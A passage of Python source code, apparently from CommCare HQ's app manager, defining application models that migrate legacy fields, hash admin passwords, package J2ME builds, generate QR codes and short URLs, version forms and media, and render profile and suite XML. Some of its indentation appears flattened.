        # NOTE: `name` is not part of the comparison.
        same_langs = self.langs == other.langs
        same_worker = self.practice_mobile_worker_id == other.practice_mobile_worker_id
        return same_langs and same_worker

    def __ne__(self, other):
        return not self.__eq__(other)
class ApplicationBase(VersionedDoc, SnapshotMixin,
CommCareFeatureSupportMixin,
CommentMixin):
"""
Abstract base class for Application and RemoteApp.
Contains methods for generating the various files and zipping them into CommCare.jar
See note at top of file for high-level overview.
"""
_blobdb_type_code = CODES.application
recipients = StringProperty(default="")
# this is the supported way of specifying which commcare build to use
build_spec = SchemaProperty(BuildSpec)
platform = StringProperty(
choices=["nokia/s40", "nokia/s60", "winmo", "generic"],
default="nokia/s40"
)
text_input = StringProperty(
choices=['roman', 'native', 'custom-keys', 'qwerty'],
default="roman"
)
# The following properties should only appear on saved builds
# built_with stores a record of CommCare build used in a saved app
built_with = SchemaProperty(BuildRecord)
build_signed = BooleanProperty(default=True)
built_on = DateTimeProperty(required=False)
build_comment = StringProperty()
comment_from = StringProperty()
build_broken = BooleanProperty(default=False)
is_auto_generated = BooleanProperty(default=False)
# not used yet, but nice for tagging/debugging
# currently only canonical value is 'incomplete-build',
# for when build resources aren't found where they should be
build_broken_reason = StringProperty()
# watch out for a past bug:
# when reverting to a build that happens to be released
# that got copied into into the new app doc, and when new releases were made,
# they were automatically starred
# AFAIK this is fixed in code, but my rear its ugly head in an as-yet-not-understood
# way for apps that already had this problem. Just keep an eye out
is_released = BooleanProperty(default=False)
# django-style salted hash of the admin password
admin_password = StringProperty()
# a=Alphanumeric, n=Numeric, x=Neither (not allowed)
admin_password_charset = StringProperty(choices=['a', 'n', 'x'], default='n')
langs = StringListProperty()
secure_submissions = BooleanProperty(default=False)
# metadata for data platform
amplifies_workers = StringProperty(
choices=[AMPLIFIES_YES, AMPLIFIES_NO, AMPLIFIES_NOT_SET],
default=AMPLIFIES_NOT_SET
)
amplifies_project = StringProperty(
choices=[AMPLIFIES_YES, AMPLIFIES_NO, AMPLIFIES_NOT_SET],
default=AMPLIFIES_NOT_SET
)
minimum_use_threshold = StringProperty(
default='15'
)
experienced_threshold = StringProperty(
default='3'
)
# exchange properties
cached_properties = DictProperty()
description = StringProperty()
deployment_date = DateTimeProperty()
phone_model = StringProperty()
user_type = StringProperty()
attribution_notes = StringProperty()
# always false for RemoteApp
case_sharing = BooleanProperty(default=False)
vellum_case_management = BooleanProperty(default=True)
# legacy property; kept around to be able to identify (deprecated) v1 apps
application_version = StringProperty(default=APP_V2, choices=[APP_V1, APP_V2], required=False)
last_modified = DateTimeProperty()
def assert_app_v2(self):
assert self.application_version == APP_V2
build_profiles = SchemaDictProperty(BuildProfile)
practice_mobile_worker_id = StringProperty()
use_j2me_endpoint = BooleanProperty(default=False)
target_commcare_flavor = StringProperty(
default='none',
choices=['none', TARGET_COMMCARE, TARGET_COMMCARE_LTS]
)
# Whether or not the Application has had any forms submitted against it
has_submissions = BooleanProperty(default=False)
# domains that are allowed to have linked apps with this master
linked_whitelist = StringListProperty()
mobile_ucr_restore_version = StringProperty(
default=MOBILE_UCR_VERSION_1, choices=MOBILE_UCR_VERSIONS, required=False
)
location_fixture_restore = StringProperty(
default=DEFAULT_LOCATION_FIXTURE_OPTION, choices=LOCATION_FIXTURE_OPTIONS,
required=False
)
    @staticmethod
    def _scrap_old_conventions(data):
        """Migrate deprecated fields in *data* in place.

        Returns True when the migration should be persisted immediately.
        """
        should_save = False
        # scrape for old conventions and get rid of them
        if 'commcare_build' in data:
            version, build_number = data['commcare_build'].split('/')
            data['build_spec'] = BuildSpec.from_string("%s/latest" % version).to_json()
            del data['commcare_build']
        if 'commcare_tag' in data:
            version, build_number = current_builds.TAG_MAP[data['commcare_tag']]
            data['build_spec'] = BuildSpec.from_string("%s/latest" % version).to_json()
            del data['commcare_tag']
        if "built_with" in data and isinstance(data['built_with'], six.string_types):
            soft_assert_type_text(data['built_with'])
            data['built_with'] = BuildSpec.from_string(data['built_with']).to_json()
        if 'native_input' in data:
            if 'text_input' not in data:
                data['text_input'] = 'native' if data['native_input'] else 'roman'
            del data['native_input']
        if 'build_langs' in data:
            if data['build_langs'] != data['langs'] and 'build_profiles' not in data:
                # preserve the old per-build language list as a build profile
                data['build_profiles'] = {
                    uuid.uuid4().hex: dict(
                        name=', '.join(data['build_langs']),
                        langs=data['build_langs']
                    )
                }
                should_save = True
            del data['build_langs']
        if 'original_doc' in data:
            data['copy_history'] = [data.pop('original_doc')]
            should_save = True
        return should_save
    @classmethod
    def wrap(cls, data, scrap_old_conventions=True):
        """Wrap *data*, optionally migrating deprecated fields first."""
        if scrap_old_conventions:
            should_save = cls._scrap_old_conventions(data)
        data["description"] = data.get('description') or data.get('short_description')
        self = super(ApplicationBase, cls).wrap(data)
        if not self.build_spec or self.build_spec.is_null():
            self.build_spec = get_default_build_spec()
        if scrap_old_conventions and should_save:
            # persist the migration so it doesn't re-run on the next load
            self.save()
        return self
    @property
    @memoized
    def global_app_config(self):
        # Cached per instance via @memoized.
        return GlobalAppConfig.for_app(self)
    def rename_lang(self, old_lang, new_lang):
        # Only validates new_lang here; old_lang is unused.
        # NOTE(review): subclasses presumably perform the actual rename.
        validate_lang(new_lang)
def is_remote_app(self):
return False
    @memoized
    def get_previous_version(self):
        # Most recent saved copy of this app's master (descending, limit 1).
        return self.view('app_manager/applications',
            startkey=[self.domain, self.master_id, {}],
            endkey=[self.domain, self.master_id],
            include_docs=True,
            limit=1,
            descending=True,
        ).first()
    @memoized
    def get_latest_saved(self):
        """
        Latest released build if any, otherwise the latest build.
        This looks really similar to get_latest_app, not sure why tim added
        """
        doc = (get_latest_released_app_doc(self.domain, self._id) or
               get_latest_build_doc(self.domain, self._id))
        return self.__class__.wrap(doc) if doc else None
def set_admin_password(self, raw_password):
salt = os.urandom(5).encode('hex')
self.admin_password = make_password(raw_password, salt=salt)
if raw_password.isnumeric():
self.admin_password_charset = 'n'
elif raw_password.isalnum():
self.admin_password_charset = 'a'
else:
self.admin_password_charset = 'x'
    def get_build(self):
        # The CommCare build described by this app's build_spec.
        return self.build_spec.get_build()
    @property
    def build_version(self):
        """The build version as a LooseVersion, or None when unset."""
        # `LooseVersion`s are smart!
        # LooseVersion('2.12.0') > '2.2'
        # (even though '2.12.0' < '2.2')
        if self.build_spec.version:
            return LooseVersion(self.build_spec.version)
    @property
    def commcare_minor_release(self):
        """This is mostly just for views"""
        # e.g. '2.12' — minor_release() returns a (major, minor) pair.
        return '%d.%d' % self.build_spec.minor_release()
@property
def short_name(self):
return self.name if len(self.name) <= 12 else '%s..' % self.name[:10]
    @property
    def url_base(self):
        # Allow subclasses/instances to override the base URL.
        custom_base_url = getattr(self, 'custom_base_url', None)
        return custom_base_url or get_url_base()
@absolute_url_property
def post_url(self):
if self.secure_submissions:
url_name = 'receiver_secure_post_with_app_id'
else:
url_name = 'receiver_post_with_app_id'
return reverse(url_name, args=[self.domain, self.get_id])
    @absolute_url_property
    def key_server_url(self):
        # Fully qualified key-server URL for this domain.
        return reverse('key_server_url', args=[self.domain])
    @absolute_url_property
    def heartbeat_url(self):
        # Fully qualified phone-heartbeat URL for this app.
        return reverse('phone_heartbeat', args=[self.domain, self.get_id])
    @absolute_url_property
    def ota_restore_url(self):
        # Fully qualified OTA restore URL for this app.
        return reverse('app_aware_restore', args=[self.domain, self._id])
    @absolute_url_property
    def form_record_url(self):
        # Hard-coded PACT form-data API path for this domain.
        return '/a/%s/api/custom/pact_formdata/v1/' % self.domain
    @absolute_url_property
    def hq_profile_url(self):
        # RemoteApp already has a property called "profile_url",
        # Application.profile_url just points here to stop the conflict
        # http://manage.dimagi.com/default.asp?227088#1149422
        return "%s?latest=true" % (
            reverse('download_profile', args=[self.domain, self._id])
        )
@absolute_url_property
def media_profile_url(self):
return "%s?latest=true" % (
reverse('download_media_profile', args=[self.domain, self._id])
)
@property
def profile_loc(self):
return "jr://resource/profile.xml"
@absolute_url_property
def jar_url(self):
return reverse('download_jar', args=[self.domain, self._id])
@absolute_url_property
def recovery_measures_url(self):
return reverse('recovery_measures', args=[self.domain, self._id])
def get_jar_path(self):
    """
    Map this app's (platform, text_input) combination to the directory
    path of the matching CommCare jar inside the build.
    """
    platform_dirs = {
        'nokia/s40': 'Nokia/S40',
        'nokia/s60': 'Nokia/S60',
        'generic': 'Generic/Default',
        'winmo': 'Native/WinMo',
    }
    path = platform_dirs[self.platform]
    # Nokia builds additionally vary by the configured text-input mode.
    if self.platform in ('nokia/s40', 'nokia/s60'):
        input_suffixes = {
            'native': '-native-input',
            'roman': '-generic',
            'custom-keys': '-custom-keys',
            'qwerty': '-qwerty',
        }
        path += input_suffixes[self.text_input]
    return path
def get_jadjar(self):
    """Return the jad/jar pair for this app's platform from the chosen build."""
    return self.get_build().get_jadjar(self.get_jar_path(), self.use_j2me_endpoint)

def validate_jar_path(self):
    """
    Raise AppEditingError when the configured text-input mode requires a
    newer CommCare version than this app's build targets.
    """
    build = self.get_build()
    setting = commcare_settings.get_commcare_settings_lookup()['hq']['text_input']
    value = self.text_input
    # 'since' maps setting value -> first CommCare version that supports it
    setting_version = setting['since'].get(value)
    if setting_version:
        setting_version = tuple(map(int, setting_version.split('.')))
        my_version = build.minor_release()
        if my_version < setting_version:
            i = setting['values'].index(value)
            assert i != -1
            name = _(setting['value_names'][i])
            raise AppEditingError((
                '%s Text Input is not supported '
                'in CommCare versions before %s.%s. '
                '(You are using %s.%s)'
            ) % ((name,) + setting_version + my_version))
@property
def jad_settings(self):
    """Key/value settings written into the J2ME jad file."""
    settings = {
        'JavaRosa-Admin-Password': self.admin_password,
        'Profile': self.profile_loc,
        'MIDlet-Jar-URL': self.jar_url,
        #'MIDlet-Name': self.name,
        # e.g. 2011-Apr-11 20:45
        'CommCare-Release': "true",
    }
    # Build-Number was only needed before CommCare 2.8
    if not self.build_version or self.build_version < LooseVersion('2.8'):
        settings['Build-Number'] = self.version
    return settings
def create_build_files(self, build_profile_id=None):
    """Generate every build artifact and stage each one as a lazy attachment under files/."""
    for path, contents in self.create_all_files(build_profile_id).items():
        self.lazy_put_attachment(contents, 'files/%s' % path)
def create_jadjar_from_build_files(self, save=False):
    """
    Return the (jad, jar) pair for this build, packing it from the staged
    build files on first use; with save=True the packed artifacts are
    stored back as attachments.
    """
    self.validate_jar_path()
    # Serialize concurrent packing attempts for the same app
    with CriticalSection(['create_jadjar_' + self._id]):
        try:
            # Already packed previously — reuse the stored attachments.
            return (
                self.lazy_fetch_attachment('CommCare.jad'),
                self.lazy_fetch_attachment('CommCare.jar'),
            )
        except (ResourceNotFound, KeyError):
            # Collect all staged build files, stripping the 'files/' prefix.
            all_files = {
                filename[len('files/'):]: self.lazy_fetch_attachment(filename)
                for filename in self.blobs if filename.startswith('files/')
            }
            # The packer needs bytes, so encode any text contents.
            all_files = {
                name: (contents if isinstance(contents, (bytes, SafeBytes)) else contents.encode('utf-8'))
                for name, contents in all_files.items()
            }
            release_date = self.built_with.datetime or datetime.datetime.utcnow()
            jad_settings = {
                'Released-on': release_date.strftime("%Y-%b-%d %H:%M"),
            }
            jad_settings.update(self.jad_settings)
            jadjar = self.get_jadjar().pack(all_files, jad_settings)

            if save:
                self.lazy_put_attachment(jadjar.jad, 'CommCare.jad')
                self.lazy_put_attachment(jadjar.jar, 'CommCare.jar')
                self.built_with.signed = jadjar.signed

            return jadjar.jad, jadjar.jar
@property
@memoized
def timing_context(self):
    """Shared TimingContext used by @time_method() to record build timings."""
    return TimingContext(self.name)

def validate_app(self):
    """Run base-level validation; Application overrides with a stricter validator."""
    return ApplicationBaseValidator(self).validate_app()
@absolute_url_property
def odk_profile_url(self):
    """Download URL of the ODK (Android) profile."""
    return reverse('download_odk_profile', args=[self.domain, self._id])

@absolute_url_property
def odk_media_profile_url(self):
    """Download URL of the ODK (Android) media profile."""
    return reverse('download_odk_media_profile', args=[self.domain, self._id])
def get_odk_qr_code(self, with_media=False, build_profile_id=None, download_target_version=False):
    """Returns a QR code, as a PNG to install on CC-ODK"""
    # NOTE(review): the cache filename varies only on download_target_version,
    # not on with_media/build_profile_id — a cached code for one combination
    # appears to be served for others; confirm whether that is intended.
    filename = 'qrcode.png' if not download_target_version else 'qrcode-targeted.png'
    try:
        return self.lazy_fetch_attachment(filename)
    except ResourceNotFound:
        url = self.odk_profile_url if not with_media else self.odk_media_profile_url
        kwargs = []
        if build_profile_id is not None:
            kwargs.append('profile={profile_id}'.format(profile_id=build_profile_id))
        if download_target_version:
            kwargs.append('download_target_version=true')
        url += '?' + '&'.join(kwargs)

        image = qrcode.make(url)
        output = BytesIO()
        image.save(output, "PNG")
        qr_content = output.getvalue()
        # Cache the rendered PNG for subsequent requests.
        self.lazy_put_attachment(qr_content, filename,
                                 content_type="image/png")
        return qr_content
def generate_shortened_url(self, view_name, build_profile_id=None):
    """
    Return a bitly-shortened URL for the given download view, or None when
    bitly is not configured or the request fails (the failure is logged and
    the function implicitly returns None).
    """
    try:
        if settings.BITLY_LOGIN:
            if build_profile_id is not None:
                long_url = "{}{}?profile={}".format(
                    self.url_base, reverse(view_name, args=[self.domain, self._id]), build_profile_id
                )
            else:
                long_url = "{}{}".format(self.url_base, reverse(view_name, args=[self.domain, self._id]))

            shortened_url = bitly.shorten(long_url)
        else:
            shortened_url = None
    except Exception:
        logging.exception("Problem creating bitly url for app %s. Do you have network?" % self.get_id)
    else:
        return shortened_url
def get_short_url(self, build_profile_id=None):
    """
    Shortened jad-download URL. For the default profile the result is
    cached on the doc (and saved); per-profile URLs are never cached.
    """
    if build_profile_id:
        return self.generate_shortened_url('download_jad', build_profile_id)
    if not self.short_url:
        self.short_url = self.generate_shortened_url('download_jad')
        self.save()
    return self.short_url
def get_short_odk_url(self, with_media=False, build_profile_id=None):
    """
    Shortened ODK profile (or media profile) URL. As with get_short_url,
    only the default-profile URL is cached on the doc and saved.
    """
    view_name = 'download_odk_media_profile' if with_media else 'download_odk_profile'
    if build_profile_id:
        return self.generate_shortened_url(view_name, build_profile_id)
    cache_attr = 'short_odk_media_url' if with_media else 'short_odk_url'
    if not getattr(self, cache_attr):
        setattr(self, cache_attr, self.generate_shortened_url(view_name))
        self.save()
    return getattr(self, cache_attr)
def fetch_jar(self):
    """Fetch the raw CommCare jar for this app's platform."""
    return self.get_jadjar().fetch_jar()

@time_method()
def make_build(self, comment=None, user_id=None):
    """
    Create an unsaved build copy of this app: assigns an id, generates the
    build files, stamps build metadata, and schedules pruning of old
    auto-generated builds.
    """
    copy = super(ApplicationBase, self).make_build()
    if not copy._id:
        # I expect this always to be the case
        # but check explicitly so as not to change the _id if it exists
        copy._id = uuid.uuid4().hex

    copy.create_build_files()

    # since this hard to put in a test
    # I'm putting this assert here if copy._id is ever None
    # which makes tests error
    assert copy._id

    built_on = datetime.datetime.utcnow()
    copy.date_created = built_on
    copy.built_on = built_on
    copy.built_with = BuildRecord(
        version=copy.build_spec.version,
        build_number=copy.version,
        datetime=built_on,
    )
    copy.build_comment = comment
    copy.comment_from = user_id
    copy.is_released = False

    prune_auto_generated_builds.delay(self.domain, self._id)

    return copy
def delete_app(self):
    """
    Soft-delete: tag the doc_type with '-Deleted' and return an (already
    saved) undo record. The app doc itself is not saved here.
    """
    domain_has_apps.clear(self.domain)
    self.doc_type += '-Deleted'
    record = DeleteApplicationRecord(
        domain=self.domain,
        app_id=self.id,
        datetime=datetime.datetime.utcnow()
    )
    record.save()
    return record
def save(self, response_json=None, increment_version=None, **params):
    """Save the doc, refreshing caches and emitting analytics side effects."""
    from corehq.apps.analytics.tasks import track_workflow, send_hubspot_form, HUBSPOT_SAVED_APP_FORM_ID
    self.last_modified = datetime.datetime.utcnow()
    # First-ever save of a new doc in a domain with no apps yet: bust the cache.
    if not self._rev and not domain_has_apps(self.domain):
        domain_has_apps.clear(self.domain)

    LatestAppInfo(self.master_id, self.domain).clear_caches()

    get_all_case_properties.clear(self)
    get_usercase_properties.clear(self)

    request = view_utils.get_request()
    user = getattr(request, 'couch_user', None)
    # Analytics: track saves made within a user's first 24 hours.
    if user and user.days_since_created == 0:
        track_workflow(user.get_email(), 'Saved the App Builder within first 24 hours')
    send_hubspot_form(HUBSPOT_SAVED_APP_FORM_ID, request)
    super(ApplicationBase, self).save(
        response_json=response_json, increment_version=increment_version, **params)
@classmethod
def save_docs(cls, docs, **kwargs):
    """Bulk save that stamps last_modified on every doc (bypasses .save())."""
    utcnow = datetime.datetime.utcnow()
    for doc in docs:
        doc['last_modified'] = utcnow
    super(ApplicationBase, cls).save_docs(docs, **kwargs)

# Backwards-compatible alias
bulk_save = save_docs
def set_form_versions(self):
    """Hook for subclasses (see Application); no-op here."""
    # by default doing nothing here is fine.
    pass

def set_media_versions(self):
    """Hook for subclasses (see Application); no-op here."""
    pass

def get_build_langs(self, build_profile_id=None):
    """Languages for the given build profile, or the app's langs when None."""
    if build_profile_id is not None:
        return self.build_profiles[build_profile_id].langs
    else:
        return self.langs
def validate_lang(lang):
    """Raise ValueError unless *lang* looks like a language code, e.g. 'en', 'fra', 'en-gb'."""
    if re.match(r'^[a-z]{2,3}(-[a-z]*)?$', lang) is None:
        raise ValueError("Invalid Language")
class SavedAppBuild(ApplicationBase):
    """A saved build of an application, as listed on the releases page."""

    def releases_list_json(self, timezone):
        """
        returns minimum possible data that could be used to list a Build on releases page on HQ

        :param timezone: timezone expected for timestamps in result
        :return: data dict
        """
        data = super(SavedAppBuild, self).to_json().copy()
        # ignore details that are not used
        for key in ('modules', 'user_registration', 'external_blobs',
                    '_attachments', 'profile', 'translations',
                    'description', 'short_description', 'multimedia_map', 'media_language_map'):
            data.pop(key, None)
        # Convert server-side UTC timestamps into the requested timezone.
        built_on_user_time = ServerTime(self.built_on).user_time(timezone)
        data.update({
            'id': self.id,
            'built_on_date': built_on_user_time.ui_string(USER_DATE_FORMAT),
            'built_on_time': built_on_user_time.ui_string(USER_TIME_FORMAT),
            'menu_item_label': self.built_with.get_menu_item_label(),
            'jar_path': self.get_jar_path(),
            'short_name': self.short_name,
            'enable_offline_install': self.enable_offline_install,
        })
        comment_from = data['comment_from']
        if comment_from:
            # Resolve the commenting user's display name, falling back to the raw id.
            data['comment_user_name'] = get_display_name_for_user_id(
                self.domain, comment_from, default=comment_from)

        return data
class Application(ApplicationBase, TranslationMixin, ApplicationMediaMixin,
                  ApplicationIntegrationMixin):
    """
    An Application that can be created entirely through the online interface
    """
    modules = SchemaListProperty(ModuleBase)
    name = StringProperty()
    # profile's schema is {'features': {}, 'properties': {}, 'custom_properties': {}}
    # ended up not using a schema because properties is a reserved word
    profile = DictProperty()
    use_custom_suite = BooleanProperty(default=False)
    custom_base_url = StringProperty()
    cloudcare_enabled = BooleanProperty(default=False)

    # how app strings are generated; must be one of app_strings.CHOICES
    translation_strategy = StringProperty(default='select-known',
                                          choices=list(app_strings.CHOICES.keys()))
    auto_gps_capture = BooleanProperty(default=False)
    date_created = DateTimeProperty()
    created_from_template = StringProperty()
    use_grid_menus = BooleanProperty(default=False)
    # which modules show their forms in a grid layout
    grid_form_menus = StringProperty(default='none',
                                     choices=['none', 'all', 'some'])
    add_ons = DictProperty()
    smart_lang_display = BooleanProperty()  # null means none set so don't default to false/true
def has_modules(self):
    """True for a non-remote app with at least one module."""
    return len(self.modules) > 0 and not self.is_remote_app()

@property
@memoized
def commtrack_enabled(self):
    """Whether this app's domain has CommTrack enabled."""
    if settings.UNIT_TESTING:
        return False  # override with .tests.util.commtrack_enabled
    domain_obj = Domain.get_by_name(self.domain) if self.domain else None
    return domain_obj.commtrack_enabled if domain_obj else False
@classmethod
def wrap(cls, data):
    """Wrap a raw couch doc, cleaning up legacy fields and inconsistent state."""
    data.pop('commtrack_enabled', None)  # Remove me after migrating apps
    # CareplanModule is no longer supported; drop any that remain in old docs.
    data['modules'] = [module for module in data.get('modules', [])
                       if module.get('doc_type') != 'CareplanModule']
    self = super(Application, cls).wrap(data)

    # make sure all form versions are None on working copies
    if not self.copy_of:
        for form in self.get_forms():
            form.version = None

    # weird edge case where multimedia_map gets set to null and causes issues
    if self.multimedia_map is None:
        self.multimedia_map = {}

    return self
def save(self, *args, **kwargs):
    """Save the app, then clear form-analytics caches and fire the post-save signal."""
    super(Application, self).save(*args, **kwargs)
    # Import loop if this is imported at the top
    # TODO: revamp so signal_connections <- models <- signals
    from corehq.apps.app_manager import signals
    from couchforms.analytics import get_form_analytics_metadata
    for xmlns in self.get_xmlns_map():
        get_form_analytics_metadata.clear(self.domain, self._id, xmlns)
    signals.app_post_save.send(Application, application=self)

def make_reversion_to_copy(self, copy):
    """Revert the working copy to *copy*, resetting per-form caches and versions."""
    app = super(Application, self).make_reversion_to_copy(copy)

    for form in app.get_forms():
        # reset the form's validation cache, since the form content is
        # likely to have changed in the revert!
        form.clear_validation_cache()
        form.version = None

    app.build_broken = False

    return app
@property
def profile_url(self):
    """Alias for hq_profile_url (see note there about RemoteApp's conflict)."""
    return self.hq_profile_url

@absolute_url_property
def suite_url(self):
    """Download URL for the generated suite.xml."""
    return reverse('download_suite', args=[self.domain, self.get_id])

@property
def suite_loc(self):
    """Suite location as referenced from the profile (relative path or jr:// URI)."""
    if self.enable_relative_suite_path:
        return './suite.xml'
    else:
        return "jr://resource/suite.xml"

@absolute_url_property
def media_suite_url(self):
    """Download URL for the generated media_suite.xml."""
    return reverse('download_media_suite', args=[self.domain, self.get_id])

@property
def media_suite_loc(self):
    """Media-suite location as referenced from the profile."""
    if self.enable_relative_suite_path:
        return "./media_suite.xml"
    else:
        return "jr://resource/media_suite.xml"

@property
def default_language(self):
    """First configured language, falling back to 'en'."""
    return self.langs[0] if len(self.langs) > 0 else "en"
def fetch_xform(self, module_id=None, form_id=None, form=None, build_profile_id=None):
    """Validate and render a form's XForm XML; pass either *form* or module/form ids."""
    if not form:
        form = self.get_module(module_id).get_form(form_id)
    return form.validate_form().render_xform(build_profile_id)
def set_form_versions(self):
    """
    Set the 'version' property on each form as follows to the current app version if the form is new
    or has changed since the last build. Otherwise set it to the version from the last build.
    """
    def _hash(val):
        return hashlib.md5(val).hexdigest()

    previous_version = self.get_previous_version()
    if previous_version:
        # A change to the set of build profiles invalidates every form version.
        force_new_version = self.build_profiles != previous_version.build_profiles
        for form_stuff in self.get_forms(bare=False):
            filename = 'files/%s' % self.get_form_filename(**form_stuff)
            form = form_stuff["form"]
            if not force_new_version:
                try:
                    previous_form = previous_version.get_form(form.unique_id)
                    # take the previous version's compiled form as-is
                    # (generation code may have changed since last build)
                    previous_source = previous_version.fetch_attachment(filename, return_bytes=True)
                except (ResourceNotFound, FormNotFoundException):
                    # New form (or missing attachment): version = None means "current"
                    form.version = None
                else:
                    previous_hash = _hash(previous_source)

                    # hack - temporarily set my version to the previous version
                    # so that that's not treated as the diff
                    previous_form_version = previous_form.get_version()
                    form.version = previous_form_version
                    my_hash = _hash(self.fetch_xform(form=form))
                    if previous_hash != my_hash:
                        form.version = None
            else:
                form.version = None
def set_media_versions(self):
    """
    Set the media version numbers for all media in the app to the current app version
    if the media is new or has changed since the last build. Otherwise set it to the
    version from the last build.
    """
    # access to .multimedia_map is slow
    previous_version = self.get_previous_version()
    prev_multimedia_map = previous_version.multimedia_map if previous_version else {}

    for path, map_item in six.iteritems(self.multimedia_map):
        prev_map_item = prev_multimedia_map.get(path, None)
        if prev_map_item and prev_map_item.unique_id:
            # Re-use the id so CommCare knows it's the same resource
            map_item.unique_id = prev_map_item.unique_id
        if (prev_map_item and prev_map_item.version
                and prev_map_item.multimedia_id == map_item.multimedia_id):
            # Unchanged media keeps its old version number.
            map_item.version = prev_map_item.version
        else:
            map_item.version = self.version
def ensure_module_unique_ids(self, should_save=False):
    """
    Creates unique_ids for modules that don't have unique_id attributes
    should_save: the doc will be saved only if should_save is set to True

    WARNING: If called on the same doc in different requests without saving,
    this function will set different uuid each time,
    likely causing unexpected behavior
    """
    if any(not mod.unique_id for mod in self.modules):
        for mod in self.modules:
            mod.get_or_create_unique_id()
        if should_save:
            self.save()
def create_app_strings(self, lang, build_profile_id=None):
    """
    Render the app-strings file for *lang* using the configured translation
    strategy; 'default' produces the merged default strings.
    """
    strategy = app_strings.CHOICES[self.translation_strategy]
    if lang != 'default':
        return strategy.create_app_strings(self, lang)
    return strategy.create_default_app_strings(self, build_profile_id)
@property
def skip_validation(self):
    """Value of the 'cc-content-valid' profile property; 'yes' by default."""
    properties = (self.profile or {}).get('properties', {})
    return properties.get('cc-content-valid', 'yes')

@property
def jad_settings(self):
    """Base jad settings plus the Skip-Validation flag."""
    s = super(Application, self).jad_settings
    s.update({
        'Skip-Validation': self.skip_validation,
    })
    return s
@time_method()
def create_profile(self, is_odk=False, with_media=False,
                   template='app_manager/profile.xml', build_profile_id=None, target_commcare_flavor=None):
    """
    Render the profile XML (as UTF-8 bytes) from the app's settings,
    feature flags, logos and the chosen build profile / CommCare flavor.
    """
    self__profile = self.profile
    app_profile = defaultdict(dict)

    # Resolve each known setting: explicit app value, else the commcare
    # default when it differs from the HQ default, else omit it.
    for setting in commcare_settings.get_custom_commcare_settings():
        setting_type = setting['type']
        setting_id = setting['id']

        if setting_type not in ('properties', 'features'):
            setting_value = None
        elif setting_id not in self__profile.get(setting_type, {}):
            if 'commcare_default' in setting and setting['commcare_default'] != setting['default']:
                setting_value = setting['default']
            else:
                setting_value = None
        else:
            setting_value = self__profile[setting_type][setting_id]
        if setting_value:
            app_profile[setting_type][setting_id] = {
                'value': setting_value,
                'force': setting.get('force', False)
            }
        # assert that it gets explicitly set once per loop
        del setting_value

    if self.case_sharing:
        app_profile['properties']['server-tether'] = {
            'force': True,
            'value': 'sync',
        }

    logo_refs = [logo_name for logo_name in self.logo_refs if logo_name in ANDROID_LOGO_PROPERTY_MAPPING]
    if logo_refs and domain_has_privilege(self.domain, privileges.COMMCARE_LOGO_UPLOADER):
        for logo_name in logo_refs:
            app_profile['properties'][ANDROID_LOGO_PROPERTY_MAPPING[logo_name]] = {
                'force': True,
                'value': self.logo_refs[logo_name]['path'],
            }

    if toggles.MOBILE_RECOVERY_MEASURES.enabled(self.domain):
        app_profile['properties']['recovery-measures-url'] = {
            'force': True,
            'value': self.recovery_measures_url,
        }

    if with_media:
        profile_url = self.media_profile_url if not is_odk else (self.odk_media_profile_url + '?latest=true')
    else:
        profile_url = self.profile_url if not is_odk else (self.odk_profile_url + '?latest=true')

    if toggles.CUSTOM_PROPERTIES.enabled(self.domain) and "custom_properties" in self__profile:
        app_profile['custom_properties'].update(self__profile['custom_properties'])

    apk_heartbeat_url = self.heartbeat_url
    locale = self.get_build_langs(build_profile_id)[0]
    target_package_id = {
        TARGET_COMMCARE: 'org.commcare.dalvik',
        TARGET_COMMCARE_LTS: 'org.commcare.lts',
    }.get(target_commcare_flavor)
    return render_to_string(template, {
        'is_odk': is_odk,
        'app': self,
        'profile_url': profile_url,
        'app_profile': app_profile,
        'cc_user_domain': cc_user_domain(self.domain),
        'include_media_suite': with_media,
        'uniqueid': self.master_id,
        'name': self.name,
        'descriptor': "Profile File",
        'build_profile_id': build_profile_id,
        'locale': locale,
        'apk_heartbeat_url': apk_heartbeat_url,
        'target_package_id': target_package_id,
    }).encode('utf-8')
@property
def custom_suite(self):
    """Hand-written suite XML attached to the app, or '' when absent."""
    try:
        return self.lazy_fetch_attachment('custom_suite.xml')
    except ResourceNotFound:
        return ""

def set_custom_suite(self, value):
    """Store hand-written suite XML as the custom_suite.xml attachment."""
    self.put_attachment(value, 'custom_suite.xml')

def create_suite(self, build_profile_id=None):
    """Generate suite.xml; only valid for app-structure v2."""
    self.assert_app_v2()
    return SuiteGenerator(self, build_profile_id).generate_suite()

def create_media_suite(self, build_profile_id=None):
    """Generate media_suite.xml."""
    return MediaSuiteGenerator(self, build_profile_id).generate_suite()
@memoized
def get_practice_user_id(self, build_profile_id=None):
    # returns app or build profile specific practice_mobile_worker_id
    if build_profile_id:
        build_spec = self.build_profiles[build_profile_id]
        return build_spec.practice_mobile_worker_id
    else:
        return self.practice_mobile_worker_id
@property
@memoized
def enable_practice_users(self):
    """Practice mobile workers: requires both app support and the domain privilege."""
    return (
        self.supports_practice_users and
        domain_has_privilege(self.domain, privileges.PRACTICE_MOBILE_WORKERS)
    )

@property
@memoized
def enable_update_prompts(self):
    """Whether phone update prompts are active for this app/domain."""
    return (
        # custom for ICDS until ICDS users are > 2.38
        (self.supports_update_prompts or toggles.ICDS.enabled(self.domain)) and
        toggles.PHONE_HEARTBEAT.enabled(self.domain)
    )
@memoized
def get_practice_user(self, build_profile_id=None):
    """
    kwargs:
        build_profile_id: id of a particular build profile to get the practice user for
            If it's None, practice user of the default app is returned

    Returns:
        App or build profile specific practice user and validates that the user is
            a practice mode user and that user belongs to app.domain

    This is memoized to avoid refetching user when validating app, creating build files and
        generating suite file.
    """
    practice_user_id = self.get_practice_user_id(build_profile_id=build_profile_id)
    if practice_user_id:
        return get_and_assert_practice_user_in_domain(practice_user_id, self.domain)
    else:
        return None
@time_method()
def create_practice_user_restore(self, build_profile_id=None):
    """
    Returns:
        Returns restore xml as a string for the practice user of app or
        app profile specfied by build_profile_id
        Raises a PracticeUserException if the user is not practice user
    """
    from corehq.apps.ota.models import DemoUserRestore
    if not self.enable_practice_users:
        return None
    user = self.get_practice_user(build_profile_id)
    if user:
        user_restore = DemoUserRestore.objects.get(id=user.demo_restore_id)
        return user_restore.get_restore_as_string()
    else:
        return None
@classmethod
def get_form_filename(cls, type=None, form=None, module=None):
    """Build-relative path of the compiled XForm for *form* within *module*."""
    return 'modules-%s/forms-%s.xml' % (module.id, form.id)
@time_method()
def _make_language_files(self, prefix, build_profile_id):
    """App-strings files (default + each build language), keyed by build path."""
    return {
        "{}{}/app_strings.txt".format(prefix, lang): self.create_app_strings(lang, build_profile_id).encode('utf-8')
